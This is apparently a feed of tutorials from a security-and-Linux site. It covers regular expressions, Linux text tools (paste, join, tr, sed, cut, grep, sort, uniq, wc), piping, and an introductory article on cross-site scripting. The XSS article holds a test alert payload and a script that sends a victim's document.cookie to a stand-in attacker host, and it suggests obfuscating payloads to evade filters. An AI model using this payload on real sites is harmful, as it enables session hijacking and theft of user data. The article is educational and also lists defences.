If you want to verify the above examples on your own, or the regex patterns that we will see in the rest of this article (which I encourage you to do), you can do so on Regex101. This useful website offers an interactive regex debugger, where you can test your own regex patterns against an input string.
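
If you'd rather test patterns from a terminal instead of a website, grep can do the job. Here is a small sketch using the IP-address example from above (note that \b is a GNU grep extension, so this may behave differently on other grep implementations):

```shell
# Print only the lines that look like an IPv4 address,
# using the article's example pattern with grep -E.
# Note: \b (word boundary) is a GNU grep extension.
printf '192.168.0.1\nnot an ip\n' \
  | grep -E '\b[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\b'
```

Only the first line, 192.168.0.1, is printed.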

How to Write Regular Expressions?

Now that you have witnessed with your own eyes what Regular Expressions are capable of, it is time for you to start learning the art of Regex-Fu.

So, without any more delay, your training begins now.

Literal Characters

The most basic regular expression you can write is simply using the literal text string that you wish to find.

For instance, using discovery as the regex pattern against the string : I made a discovery today will match the occurrence of the word discovery.

The word discovery occurs one time only in this example. If there had been more than one occurrence of that word, then, depending on the options that you’re using regex with, it may only match the first occurrence of the literal string.

The way you define these options (Sometimes also called flags) varies depending on the application or programming language you’re using, as not all implementations of Regex are equal. If you’re only using Regex101 to test your patterns, then you can click on the ‘mg’ characters as shown in the image below to set your Regex options.

set regex options in regex101

The most important flags that you may want to set are global (To return all occurrences instead of only the first one) and insensitive (To perform case insensitive matches. That is, without differentiating between uppercase and lowercase letters).
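
As a loose command-line analogy (not an exact equivalent of the Regex101 flags), grep exposes similar switches: -i performs a case-insensitive match, and -o prints every match on its own line, much like the global flag returns all occurrences:

```shell
# -i: case-insensitive match; -o: print each match on its own line.
# Here both "Discovery" and "discovery" are found in a single input line.
printf 'I made a Discovery; what a discovery!\n' | grep -oi 'discovery'
```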

Enough with flags now, let’s go back to our regex patterns.

Character Classes

A character class is used to match one of many given characters. To specify one, you should enclose the characters into square brackets [].

For instance, using the expression [gst]old will match with the words gold, sold, as well as told. However, it won’t match with gstold.

You can also use a hyphen in a character class to specify a range. For instance, [a-z] will match all characters between a and z (That is, all lowercase letters). You can also match only digit numbers by using [0-9].

To make things even more interesting, you can combine all these ranges in a single character class : [a-zA-Z0-9._-]. This class will match with all lowercase and uppercase letters, digit numbers, as well as the dot ., underscore _, and hyphen - characters.

If you find it tiring to have to type all these ranges, then you can use shorthand classes for the ones that people use often. You can use \d instead of [0-9] to match a digit number, or \w instead of [a-zA-Z0-9_] to match a word character (all letters, digits, plus the underscore character).
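
Here is a quick sketch of character classes on the command line with grep -E. One caveat: the shorthand classes \d and \w are Perl-style; grep -E does not understand them, so you use the explicit ranges (or POSIX classes such as [[:digit:]]) instead:

```shell
# [gst]old matches exactly one of g, s, or t, followed by "old".
# Anchored with ^ and $, only gold, sold, and told match below.
printf 'gold\nsold\ntold\nbold\ngstold\n' | grep -E '^[gst]old$'

# grep -E has no \d shorthand; use [0-9] or [[:digit:]] instead.
printf 'item42\n' | grep -E '[0-9]+'
```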

Now, as much as these classes are powerful and flexible in matching all sorts of characters, they are still limited in that they only match one character at a time. On their own, classes won’t be able to match an entire word. This is where quantifiers come into play.

Quantifiers

A quantifier specifies how many consecutive occurrences of a specific character, or a class has to be present in a string before it can match it.

There are three main special characters that you can use as quantifiers, and these are :

  • The star character * provides a match if zero or more consecutive occurrences of the previous element are present.
  • The plus sign + matches if one or more consecutive occurrences of the previous element are present.
  • And the question mark ? matches if zero or one occurrence of the previous element is present.

Here are some examples to make things clearer:

  • No+ will match with ‘No’, ‘Noo’, ‘Nooo’, ‘Noooo’… (You can see where I’m going, I don’t need to continue forever).
  • computers? will match with ‘computer’ and ‘computers’ (Zero or one occurrence of the character ‘s’).
  • 0*[0-9]? will match with any number between 0 and 9, whether it is written as a single digit (0,1,…,9), or starting with one or more zeros (ex. 01, 0005, 003).
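
The same examples can be checked from a terminal. The sketch below anchors each pattern with ^ and $ so the whole line has to match:

```shell
# No+ requires at least one 'o', so "N" is rejected but "No" and "Nooo" match.
printf 'N\nNo\nNooo\n' | grep -E '^No+$'

# computers? makes the trailing 's' optional, so both forms match.
printf 'computer\ncomputers\ncompute\n' | grep -E '^computers?$'
```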

You can also specify the exact number of times that you want the previous element to match by using curly braces {}.

As always, a couple of examples will demonstrate the three main ways you can use curly braces as quantifiers :

  • [0-9]{5} will match any number with 5 digits.
  • a{1,3}nd will match with and, aand, as well as aaand (That is, with any number of occurrences between 1 and 3).
  • And [a-zA-Z0-9]{8,} will match with any string of 8 or more characters (This can be used to validate passwords when requiring users to choose passwords with at least 8 characters of length).
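
The curly-brace quantifiers behave the same way on the command line. A quick sketch with grep -E:

```shell
# {5} demands exactly five digits, so only 12345 survives the anchors.
printf '12345\n123\n123456\n' | grep -E '^[0-9]{5}$'

# {1,3} allows between one and three 'a's: "and" and "aaand" match,
# but "aaaand" (four 'a's) does not.
printf 'and\naaand\naaaand\n' | grep -E '^a{1,3}nd$'
```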

Groups

You can use parentheses around a set of characters to create a group. If you add a quantifier after it, it will apply to the entire group, not just the last character or class.

As an example, (ha){2,} will match with haha, hahaha,… (Any time there is a laugh).

You can also use a group with an alternation. This is the equivalent of the or operator.

For example, I love (coffee|tea) will match with both I love coffee, and I love tea.

You can also use parentheses to create a capturing group. Every time you use parentheses in your expression, a capturing group is created. You can think of it as a variable that holds the text string that matched between the parentheses.

To go back to our previous example, I love (coffee|tea): we have one set of parentheses, which means we have one group (group 1). If we run this regex pattern against the string I love tea, then group 1 will contain the string tea.

Retrieving the value contained in capturing groups depends on the programming language or application that you’re using regex with. However, if you are only testing with Regex101, then you can still see their content in the “Match information block” on the right side as shown in the screen below:

capturing groups in regex101

This example has only one capturing group, but you can have as many as you want.
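
One common way to use a captured value from the command line is sed's backreference syntax, where \1 stands for whatever group 1 matched. A small sketch (-E enables extended regex and is supported by both GNU and BSD sed):

```shell
# \1 in the replacement is whatever (coffee|tea) captured.
echo 'I love tea' | sed -E 's/I love (coffee|tea)/My favorite drink is \1/'
# prints: My favorite drink is tea
```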

The Dot

The Dot . in regex has a special meaning. It matches all characters (Except for a line break).

The regex pattern c.ffee will match with coffee, caffee, c8ffee, c-ffee

It is used often in combination with quantifiers (+, *,…).

The regex pattern .* will match any string that is given as its input. On its own, it isn't of much use. However, when combined with other regex elements, it can fill in any part of a pattern where we don't know what the matching string will contain.

For example, the regex pattern c.*s, will literally match anything that is delimited by c and s.

Anchors

Anchors allow you to match depending on the position in the string.

The most used anchors are : ^ to match the beginning of the string (or a line, if the input string is multi-line), and $ for the end of the string (or line).

The regex pattern ^C will match any string (or line) that starts with the letter C. It would match with the string : Computer Stuffs, but not with Doing Computer Stuffs. This is because the latter starts with the character D, and not C.

Similarly, s$ will match any string (or line) that ends with the letter s. It would match the input string : Computers, but not Computer.

Another useful anchor is : \b, which is used to specify a word boundary. So, if you use the regex pattern \bcomputer\b, then this would match the string : I own a computer, but not I own computers. This is because, in the latter, there is an s character after the string computer, and not a word boundary.
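
The three anchors can be exercised with grep. A sketch using the examples above (again, \b is a GNU grep extension):

```shell
# ^C : lines starting with C — matches the first line only.
printf 'Computer Stuffs\nDoing Computer Stuffs\n' | grep '^C'

# s$ : lines ending with s — matches "Computers" but not "Computer".
printf 'Computers\nComputer\n' | grep 's$'

# \b : word boundary — "computers" has an 's' after "computer", so no match.
printf 'I own a computer\nI own computers\n' | grep 'computer\b'
```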

Escaping metacharacters

As we’ve seen in the previous sections, many characters have special meanings when used in a regex string. These include : . + ? * [ ] ( ) { }

Now, what if we want to match literally one of these characters in a string input?

For instance, what if we want to match a phone number starting with the character +. If we use the regex string +[0-9]{15}, then this would generate an error. This is because we are using the + sign without a preceding element to which the quantifier would apply.

To bypass this, and force the interpretation of these metacharacters as literal characters, we can use \ before them. So, in our example, the proper string to use would be \+[0-9]{15}.

Note that the above regex pattern is oversimplified. It won’t be able to match phone numbers that contain hyphens within them. For the sake of this example, it was simplified to only match with phone numbers starting with +, followed by 15 digit numbers. If you want a more accurate regex for phone number validation, you can take a look at the one provided as an example earlier in this article.
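
Here is the escaped pattern in action. Only the line that actually starts with a literal + followed by 15 digits matches:

```shell
# \+ matches a literal plus sign; without the backslash, grep -E
# would reject + as a quantifier with nothing before it.
printf '%s\n' '+123456789012345' '123456789012345' | grep -E '^\+[0-9]{15}$'
# prints: +123456789012345
```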

Conclusion

We have reached the end of this article. You should now be able to write your own regex patterns that suit your needs. I invite you to go back to the examples provided at the beginning of this article and try to understand why they work.

If you want to challenge yourself even further, you can also try to write regular expressions for validating dates, credit card numbers, and checking password complexity. These should keep you busy for a while.

The post A Quick Guide To Regular Expressions appeared first on Patch The Net.

Chapter 9 – Advanced Data Processing

Processing data on Linux is really simple. Many commands are available for all kinds of text-processing functions. We've seen some of these commands in the previous chapter, but they are too numerous and wide-ranging to be compressed into a single chapter.

Considering this, I deemed it necessary to dedicate another chapter to the rest of the commands that we haven't yet had the chance to cover.

Joining Files

Using Paste

“paste” is one of the most useful commands on Linux. Depending on the provided arguments, there are two ways you can use it:

  1. To join files horizontally.
  2. To join lines in a single file.

Let’s start with the first usage method.

Joining Files Horizontally

When you provide paste with two files or more as its arguments, it will join the lines of these files and send them to its standard output. Fields from these files will be separated by a tab.

To illustrate this with an example, let us consider the following three files: names.txt, age.txt, and city.txt.

  • names.txt :
James
Mary
Patricia
Robert
John
  • age.txt :
34
21
54
49
18
  • city.txt :
London
New York
Liverpool
Sydney
Glasgow

If we run “paste” against these three files without any other additional parameter, we should get an output that combines each line of these three files. Here is the result:

$ paste names.txt age.txt city.txt 
James   34      London
Mary    21      New York
Patricia        54      Liverpool
Robert  49      Sydney
John    18      Glasgow

By default, the command separates the fields from each file with a tab. If you want, you can use another delimiter by specifying it after the “-d” flag.

$ paste -d ":" names.txt age.txt city.txt
James:34:London
Mary:21:New York
Patricia:54:Liverpool
Robert:49:Sydney
John:18:Glasgow

Joining Lines in a Single File

When you provide “paste” with only one single file and use the “-s” flag, then it will combine all the lines of that file in a single line.

Here is an example to make things clear.

$ paste -s names.txt
James Mary Patricia Robert John

You can use another delimiter other than the default one. To do so, just type in “-d” followed by the delimiter just like we did before.

$ paste -s -d "," names.txt
James,Mary,Patricia,Robert,John

Using Join

The “join” command allows you to join files based on a common field.

Let us consider the following two files :

  • name-with-city.txt
James London
Mary New York
Patricia Liverpool
Robert Sydney
John Glasgow
  • name-with-age.txt
James 34
Mary 21
Patricia 54
Robert 49
John 18

We can use “join” to combine these two files. It will combine lines from both files that start with the same first field.

$ join name-with-city.txt name-with-age.txt
James London 34
Mary New York 21
Patricia Liverpool 54
Robert Sydney 49
John Glasgow 18
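
One caveat worth knowing: "join" expects both of its inputs to be sorted on the join field. The example above works because both files happen to list the names in the same order, but with arbitrary ordering, GNU join will warn that the input "is not in sorted order". Sorting first avoids the problem; here is a small sketch with hypothetical two-line files:

```shell
# join expects its inputs sorted on the join field; sort them first.
printf 'Robert Sydney\nJames London\n' | sort > city.sorted
printf 'Robert 49\nJames 34\n'         | sort > age.sorted
join city.sorted age.sorted
# James London 34
# Robert Sydney 49
```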

Text Transformation

Replacing Characters

The “tr” command is easy to use and very practical when you need to replace certain characters with others.

For example, the command below will convert everything we type into uppercase.

$ tr a-z A-Z
Typing random words!
TYPING RANDOM WORDS!

In this example, we have applied the “tr” command to the standard input. So everything we type on the terminal will get uppercased. But what if we want to uppercase the content of an existing file?

Well, that’s also possible.

To do that, we can read the file using “cat” and then pass the output to “tr” using a pipe, just as the next example will demonstrate.

Remember our file “names.txt” from the first example? All names were written in lowercase except for their first letters. Well, I personally prefer names to be in uppercase.

So, to make this file more to my taste, I’m going to use “tr” to replace all lowercase letters with their uppercase counterparts, and then save the result to a new file “namesUp.txt“.

$ cat names.txt | tr a-z A-Z > namesUp.txt

This command will not output anything to the terminal. This is because we have redirected the standard output to the file “namesUp.txt” using the “greater-than” (>) symbol.

If you're having difficulties comprehending this command, then it is probably because you have skipped the chapter about piping and redirection. If that's the case, then I invite you to go back, read that chapter, and make sure to fully understand the concepts discussed there before moving on.

Now, when we read the new file “namesUp.txt“, we can see that the names are now in uppercase letters.

$ cat namesUp.txt
JAMES
MARY
PATRICIA
ROBERT
JOHN

Advanced Text Transformation

There is another, more powerful, command that allows you to perform advanced text manipulation operations. This command is ‘sed‘, which stands for Stream EDitor.

The ‘sed‘ command allows you to automatically find and replace certain strings on a given file without having to open it. Let’s see how we can do this.

For this section, we’ll consider a file named “input.txt” with the following content:

This is John.
John is currently learning Linux, and he's constantly improving.
With enough time and dedication, John will eventually become a Linux expert.

Now, let’s say we need to substitute all occurrences of “John” with “Robert” (Feel free to use your own name if you wish).

Using ‘sed’, we can easily perform this operation.

$ sed 's/John/Robert/g' input.txt

Here, we have executed the sed command followed by a string pattern placed within single quotes, and then the path to a file.

The string pattern (s/John/Robert/g) starts with the ‘s’ character, which means that we will be using substitution. After the first slash, we type the string that we want to replace (In this case, John), and then, after the second slash, the string that we’ll be replacing it with (Robert). Finally, after the third and last slash, we have added the ‘g’ character, which stands for global. By default, sed will only replace the first occurrence of the string pattern in the file. By adding ‘g’, we make sure that all occurrences are replaced.

Here is the result we get from this command.

$ sed 's/John/Robert/g' input.txt
This is Robert.
Robert is currently learning Linux, and he's constantly improving.
With enough time and dedication, Robert will eventually become a Linux expert.
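
By default, sed only prints the transformed text; the file itself is left untouched. If you want sed to modify the file in place, you can add the -i flag. Note that this is the GNU sed syntax; BSD/macOS sed requires an explicit (possibly empty) backup suffix, as in -i ''. A quick sketch:

```shell
# -i edits the file in place instead of printing to standard output.
# (GNU sed syntax; on BSD/macOS sed, use: sed -i '' 's/John/Robert/g' input.txt)
printf 'This is John.\n' > input.txt
sed -i 's/John/Robert/g' input.txt
cat input.txt    # This is Robert.
```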

We have reached the end of this chapter. We have covered most text processing commands that you can use in Linux.

In the next chapter, we are going to learn about regular expressions.

The post Chapter 9 – Advanced Data Processing appeared first on Patch The Net.

Introduction to Cross-Site Scripting (XSS)

This article presents a great introduction for anyone trying to learn about Cross-Site Scripting (or XSS). You don’t need to be an expert to follow along. However, you do need to know some basics about how the web works in order to gain the most from this article.

We will start first by learning about what Cross-Site Scripting is and what are its types. Then, we will explore the process of conducting an XSS attack. And finally, we will list some of the good practices that we can follow to prevent it.

Disclaimer: Please note that the information taught in this article is not intended to be used for anything other than legitimate and ethical purposes. As with all my other articles, the objective here is to further expand the security culture and to help defend and protect information systems against malicious actors.

So, with that being said, let’s begin!

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a type of vulnerability that affects web applications. It allows an attacker to send malicious code to a website. That same code is then sent to other users to be executed on their browsers.

When successful, an XSS attack can provide the attacker with sensitive information from other users’ browsers. For instance, the attacker can retrieve user cookies and session tokens, which they can then use to perform session hijacking.

Here is an illustration that should help you better understand the process of the attack.

Cross Site Scripting (XSS) Process

Considering that end-users are generally trusting of the vulnerable website, they will be unsuspecting of the attack if it ever happens against them.

XSS Types

There are two main types of Cross-Site Scripting attacks: Persistent and reflected.

Persistent XSS

A persistent (Also called stored) XSS attack is the most dangerous of the two types. It occurs when the malicious script provided by the attacker is stored on the server-side of the web application. This code is then sent to other users every time they request the content associated with it.

For example, a comment section is one place where persistent XSS can occur. This is because websites store comments in a database on the server-side, and they retrieve and display them every time a user visits that section.

The above illustration is an example of a persistent XSS attack.

Reflected XSS

A reflected XSS attack is the least dangerous of the two types. In a reflected XSS scenario, the malicious script is sent to the web application and then presented to the user that submitted the request, and only to that user. The website doesn’t store anything on the server side.

A good example of where a reflected XSS attack can happen is a search form. Since only the user who provides a string in a search form can see that string in the response, an attacker won’t be able to perform a persistent XSS attack. The worst they can do is to conduct a reflected XSS attack.

This might not seem dangerous at first, but if a malicious actor combines it with a phishing attack, they can use it to retrieve sensitive information from other users.

How to perform a Cross-Site Scripting Attack

Now that we know what a Cross-Site Scripting attack is, let’s see how we can perform one.

First of all, we need to determine if our target website is vulnerable to XSS. To do so, we need to consider all points on the website where a user can provide input.

For each point, we can run a proof of concept payload that will confirm whether or not we have an XSS vulnerability. Most often, we can use the “alert()” Javascript function inside a script.

<script>alert("XSS!");</script>

If the website is vulnerable to XSS, then an alert message should pop up with the “XSS!” message. This is all the proof that we need to confirm the vulnerability of our target.

You should note that most websites may detect and block the above payload. This does not mean that these websites aren’t vulnerable, it just means that you need to obfuscate the payload to evade detection.

Once we've confirmed that the website is vulnerable, we can run a payload that sends the user's cookie to a webpage under our control.

<script>
document.write('<img src="http://www.maliciouswebsite.com/?cookie=' + document.cookie + '" />');
</script>

The above payload will attempt to load an image from a website controlled by the attacker. The link of the image contains the cookie value of the target user. So, when it receives this request, the malicious website will log this value.

The attacker can then check the logs to retrieve the cookies of all users who connected to that website.

Protect against XSS

Here are some good practices that you should follow to protect your website against XSS attacks:

  • The web application should always validate user input, and that is, for every data provided by users. This process involves ensuring that the provided input is in the expected format. For example, if you are asking the user for their age on an input field, then you should expect the provided data to be a positive integer that is less than 120. Any value that is outside of this range shouldn’t be accepted.
  • Web applications can also use encoding to escape certain characters that aren’t supposed to be processed by the web browser. For example, if we want to embed user-provided input into an HTML element, we would need to HTML-encode it. That is, we need to convert HTML reserved characters into HTML entities (For example, ‘<‘ will be converted to ‘&lt;’). Likewise, if we want to embed user-provided input into a Javascript data value, we would need to Javascript-encode it.
  • The HTTP Header can also provide a good layer of defense against XSS. The use of “Content-Type” and “X-Content-Type-Options” in response headers can limit the execution of scripts on a webpage.
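
To make the encoding idea concrete, here is a minimal sketch of HTML-encoding untrusted input with sed (the function name html_escape is my own; real applications should use their framework's battle-tested encoder rather than a hand-rolled one):

```shell
# Minimal sketch: HTML-encode untrusted input before embedding it in a page.
# Order matters — escape '&' first so the other replacements aren't re-encoded.
html_escape() {
  sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g' -e 's/"/\&quot;/g'
}
printf '%s' '<script>alert("XSS!");</script>' | html_escape
# prints: &lt;script&gt;alert(&quot;XSS!&quot;);&lt;/script&gt;
```

With the reserved characters converted to entities, the browser renders the payload as inert text instead of executing it.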

We have covered the essentials in this article. So now, you should have a basic understanding of Cross-Site Scripting.

Nevertheless, there is more to XSS than what we have covered here. So you shouldn’t be content. At least not yet. I invite you to build on what we have discussed here and learn from other resources on the web. For instance, the OWASP and PortSwigger websites provide a good reference for this topic.

The post Introduction to Cross-Site Scripting (XSS) appeared first on Patch The Net.

Chapter 8 – Extract and Process Data

In this chapter, we are going to learn how to extract and process data from a file on Linux.

Extract and process data in Linux

To test the examples given in this chapter, I will create a file that I will name “data.txt” containing a list of books, with their year of publication, author, and country of origin:

In Search of Lost Time, 1913, Marcel Proust, France
Ulysses, 1922, James Joyce, Ireland
Don Quixote, 1615, Miguel De Cervantes, Spain
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
War and Peace, 1869, Leo Tolstoy, Russia

I invite you to create the same file on your local machine and copy the above content.

Extract Data

When it comes to extracting data from a file, there are two essential commands that you should know: cut and grep.

Extract Portions of lines

The command “cut” allows you to extract portions of each line of a given file, depending on the provided options. The resulting text is then sent to the standard output.

You should specify at least one option with the command so that it knows how to cut each line. Otherwise, it won’t work.

Let’s see how to use two of these options.

Extract by character

The “-c” flag specifies which characters to extract.

Here are a few examples to make things clear.

The following command will output the fifth character of each line:

$ cut -c 5 data.txt
e
s
Q
G
a

This command will output the third, sixth, and eighth characters of each line:

$ cut -c 3,6,8 data.txt
 ac
ye,
nux
era
rn 

And finally, this command will output the characters of each line from the fourth through the tenth position:

$ cut -c 4-10 data.txt
Search 
sses, 1
 Quixot
 Great 
 and Pe

As you can see from these examples, the “-c” flag doesn’t distinguish between letters, commas, and spaces. Everything counts as a character.

Extract by field

To extract by field, you need to specify two essential parameters:

  • The delimiter (using the “-d” flag): This is how you tell the “cut” command which character separates the fields on each line.
  • The field number (using the “-f” flag): This is where you specify which field to extract.

Once again, a few examples will be more useful to you than plain explanations.

The following command will output the third field from our file (i.e., the author’s name):

$ cut -d ',' -f 3 data.txt
Marcel Proust
James Joyce
Miguel De Cervantes
F. Scott Fitzgerald
Leo Tolstoy

As you can see, I specified the comma (,) as the delimiter, and I selected the third field to extract.

If, instead, we want to retrieve the titles of the books, we can simply pass the value 1 to the “-f” option.

$ cut -d ',' -f 1 data.txt
In Search of Lost Time
Ulysses
Don Quixote
The Great Gatsby
War and Peace

Now, what if we want to extract both the title of the book and its author?

Well, we can do that as well.

$ cut -d ',' -f 1,3 data.txt
In Search of Lost Time, Marcel Proust
Ulysses, James Joyce
Don Quixote, Miguel De Cervantes
The Great Gatsby, F. Scott Fitzgerald
War and Peace, Leo Tolstoy

I can go on and on with the examples, but I think the idea should be clear to you by now. I invite you to try to extract other fields on your own in order to familiarize yourself with the “cut” command.
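One more trick worth knowing: like the “-c” flag, the “-f” flag also accepts ranges. The sketch below recreates our sample file (so that it can run on its own) and then extracts fields 1 through 2, i.e. the title and the year:

```shell
# Recreate the sample file from the beginning of the chapter
cat > data.txt << 'EOF'
In Search of Lost Time, 1913, Marcel Proust, France
Ulysses, 1922, James Joyce, Ireland
Don Quixote, 1615, Miguel De Cervantes, Spain
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
War and Peace, 1869, Leo Tolstoy, Russia
EOF

# Extract a range of fields: from the 1st through the 2nd
cut -d ',' -f 1-2 data.txt
# -> In Search of Lost Time, 1913
#    Ulysses, 1922
#    ...
```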

Extract Lines

The grep command is a life-saver. I am certain that in the future, you will find yourself using it very often. Not only does it allow you to extract content from a file, but it is also very useful in finding files that contain certain words.

The basic syntax for using “grep” is very simple: just type the command, followed by the string to search for, and then the file in which to search.

$ grep 'scott fitzgerald' data.txt

If you run the above command, you won’t get any output. This might be contrary to what you were expecting, especially since our file does contain ‘Scott Fitzgerald’.

The reason for this is that “grep” is, by default, a case-sensitive command. This means that it differentiates between uppercase and lowercase letters. Therefore, grep does not consider ‘Scott Fitzgerald’ to be the same string as ‘scott fitzgerald’.

Thankfully, we can add the “-i” flag to make the grep command case-insensitive. By doing this, we finally get the expected result:

$ grep -i 'scott fitzgerald' data.txt
The Great Gatsby, 1925, F. Scott Fitzgerald, United States

Another way to use “grep” is with the “-v” flag, which extracts the non-matching lines instead. For instance, in the example below, we retrieve all the lines that don’t contain ‘scott fitzgerald’.

$ grep -vi 'scott fitzgerald' data.txt
In Search of Lost Time, 1913, Marcel Proust, France
Ulysses, 1922, James Joyce, Ireland
Don Quixote, 1615, Miguel De Cervantes, Spain
War and Peace, 1869, Leo Tolstoy, Russia
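One more flag you may find handy is “-c”, which makes grep print the number of matching lines instead of the lines themselves. And since grep can also read from its standard input, you can pipe text straight into it (the short fruit list below is just a throwaway example):

```shell
# '-i' ignores case, '-c' counts matching lines instead of printing them.
# All three lines contain the letter 'a' (or 'A'), so the count is 3.
printf 'apple\nbanana\nApricot\n' | grep -ic 'a'
# -> 3
```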

Before we wrap up this section about grep and data extraction, there is one last thing I need to mention that makes “grep” special: its support for Regular Expressions (also known as regex). Regex is widely used to describe search patterns, and it can be very useful for finding certain strings. However, I am not going to cover it here, as that would make this a lengthy chapter. But rest assured, we will have a future chapter dedicated to regex.

Process Data

Sorting Lines

The sort command, as its name implies, sorts a list of lines. It reads the list from a file or from its standard input, sorts it, and then sends the result to its standard output.

If we run the command on our file “data.txt”, we should get an ordered set of lines.

$ sort data.txt
Don Quixote, 1615, Miguel De Cervantes, Spain
In Search of Lost Time, 1913, Marcel Proust, France
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
Ulysses, 1922, James Joyce, Ireland
War and Peace, 1869, Leo Tolstoy, Russia

By default, the result is sorted alphabetically from A to Z. If we want to reverse the order (from Z to A), we can simply specify the “-r” flag.

$ sort -r data.txt
War and Peace, 1869, Leo Tolstoy, Russia
Ulysses, 1922, James Joyce, Ireland
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
In Search of Lost Time, 1913, Marcel Proust, France
Don Quixote, 1615, Miguel De Cervantes, Spain

Now, let’s make things more interesting and try to sort the names of the authors (the third field).

Let’s try this out:

$ cut -d "," -f 3 data.txt | sort
F. Scott Fitzgerald
James Joyce
Leo Tolstoy
Marcel Proust
Miguel De Cervantes

Sorting Numbers

To sort numerically, rather than alphabetically, we should add the “-n” flag. Otherwise, numbers with different numbers of digits won’t be sorted properly.

For example, let’s consider the following file, which I named “numbers.txt”:

254
13
92
543
7
65

If we try to sort it as we did before, the result won’t be correct.

$ sort numbers.txt
13
254
543
65
7
92

That’s because, as I mentioned earlier, sort orders alphabetically by default.

However, with the “-n” flag, we can force it to sort by numbers, as shown in the following example.

$ sort -n numbers.txt
7
13
65
92
254
543
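We can also combine fields with sorting. The sort command takes a “-t” flag to set a field delimiter (the counterpart of cut’s “-d”) and a “-k” flag to pick which field to sort by. As a sketch, here is our book list sorted by publication year (the file is recreated so the example stands on its own):

```shell
# Recreate the sample file from earlier in the chapter
cat > data.txt << 'EOF'
In Search of Lost Time, 1913, Marcel Proust, France
Ulysses, 1922, James Joyce, Ireland
Don Quixote, 1615, Miguel De Cervantes, Spain
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
War and Peace, 1869, Leo Tolstoy, Russia
EOF

# '-t' sets the field delimiter, '-k 2,2' sorts on the second field only,
# and '-n' makes the comparison numeric
sort -t ',' -k 2,2 -n data.txt
# -> Don Quixote, 1615, Miguel De Cervantes, Spain
#    War and Peace, 1869, Leo Tolstoy, Russia
#    In Search of Lost Time, 1913, Marcel Proust, France
#    Ulysses, 1922, James Joyce, Ireland
#    The Great Gatsby, 1925, F. Scott Fitzgerald, United States
```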

Remove duplicates

The command “uniq” removes adjacent duplicate lines from a file. It is very simple to use: just type “uniq” followed by the name of the file.

However, since the command only compares adjacent lines, matching lines that are not next to each other will not be recognized as duplicates.

So, to be effective, we need to sort the file first before providing it as input to “uniq”.

Here is a file that I named “users.txt”, which contains a list of users with some duplicates added here and there.

David
Alex
Maria
Carlos
Anna
Marco
Ana
Antonio
Daniel
Andrea
David
Laura
Ali
Jose
Sandra
Maria
Sara
Carlos
Ana
Michael

Now, let’s filter out the duplicates using “sort” and “uniq“:

$ sort users.txt | uniq
Alex
Ali
Ana
Andrea
Anna
Antonio
Carlos
Daniel
David
Jose
Laura
Marco
Maria
Michael
Sandra
Sara

Counting

The command “wc” (short for word count) displays basic statistics about the content of a file, or of whatever is provided on its standard input.

By default, it will show three values in the following order: The number of lines, the number of words, and the number of bytes.

$ wc data.txt
5 37 234 data.txt

If we don’t need all these values, and we’re only interested in the number of lines, we can use the “-l” flag as shown in the example below:

$ wc -l data.txt
5 data.txt

Similarly, specifying the “-w” flag will print the word count.

$ wc -w data.txt
37 data.txt

And to print the byte count on its own, we can use the “-c” flag. (Note that “-c” counts bytes, not characters; for a true character count, which can differ in multibyte encodings, use the “-m” flag instead.)

$ wc -c data.txt
234 data.txt
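As a small capstone, we can chain this chapter’s commands together with pipes. For example, here is one way to count how many different countries appear in our book list (again recreating the file so the snippet stands on its own):

```shell
# Recreate the sample file
cat > data.txt << 'EOF'
In Search of Lost Time, 1913, Marcel Proust, France
Ulysses, 1922, James Joyce, Ireland
Don Quixote, 1615, Miguel De Cervantes, Spain
The Great Gatsby, 1925, F. Scott Fitzgerald, United States
War and Peace, 1869, Leo Tolstoy, Russia
EOF

# Extract the country field, sort it, drop duplicates, then count the lines
cut -d ',' -f 4 data.txt | sort | uniq | wc -l
# -> 5
```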

We have reached the end of this chapter. We have covered 5 new commands to extract and process data in Linux: cut, grep, sort, uniq, and wc. Take some time to practice what you have learned here today, and make sure that you are comfortable with each of these commands before jumping into the next chapter.

The post Chapter 8 – Extract and Process Data appeared first on Patch The Net.

]]>
https://patchthenet.com/tutorials/linux/embracing-the-power-of-linux/chapter-8-extract-and-process-data/feed/ 0
Chapter 7 – Piping and Redirection https://patchthenet.com/tutorials/linux/embracing-the-power-of-linux/chapter-7-piping-and-redirection/ https://patchthenet.com/tutorials/linux/embracing-the-power-of-linux/chapter-7-piping-and-redirection/#respond Sun, 08 Aug 2021 10:09:58 +0000 https://patchthenet.com/?p=1215 Before we start, don’t be misled by the title of this chapter. I am not going to teach you about plumbing here. We are going to cover piping and redirection […]

The post Chapter 7 – Piping and Redirection appeared first on Patch The Net.

]]>
Before we start, don’t be misled by the title of this chapter. I am not going to teach you about plumbing here. We are going to cover piping and redirection in Linux.

On a more serious note, if you have read and understood all previous chapters, then at this stage, you are no longer a beginner. You should by now be somewhat comfortable around a Linux system.

That being said, you will embark now on the second part of your journey.

From this chapter on, you will finally start to grasp the true power of Linux. You will be able to automate your workflows, manipulate text, extract and process data, and much more. None of this would be possible without redirection and piping.

Data Streams

Before we discuss piping and redirections, we first need to understand a bit of theory about something called data streams.

In Linux, a data stream is the flow of data from a source to a destination. This can be from one process to another, in which case the data travels through a pipe; or between a file and a process, in which case it travels through a redirect.

Another way of looking at data streams is to think of them as links joining two ends. On one end, you may have a command’s output; on the other end, you may have the input of another command, or a file.

As a Linux user, you should distinguish between three standard data streams that are connected by default to every Linux program:

  • Stdin (Standard Input, identified by the value 0): This is the input that the program receives.
  • Stdout (Standard Output, identified by the value 1): This is the output of the program (On a terminal, whatever goes in stdout is by default displayed on the screen).
  • Stderr (Standard Error, identified by the value 2): This is where the program sends its error messages.

Here is a simple figure to better illustrate this:

Linux Data Streams

This is all the theory that we need to cover for now. In the rest of this chapter, we will learn how to manipulate these streams which will allow us to change their default terminations.

I promise you, this won’t be as boring as it sounds. Once you complete this chapter, you will finally be able to appreciate the power of Linux (that is,… of course, if you haven’t already).

Piping

Piping connects the standard output (stdout) of one command to the standard input (stdin) of another command. We can do this using the pipe operator (|).

The pipe operator takes the output of the command on its left and sends it as an input to the command on its right.

Let’s say I run the following command:

$ ls -l

This will result in the following output:

No surprise there. I got a detailed list of the files that are in my current directory.

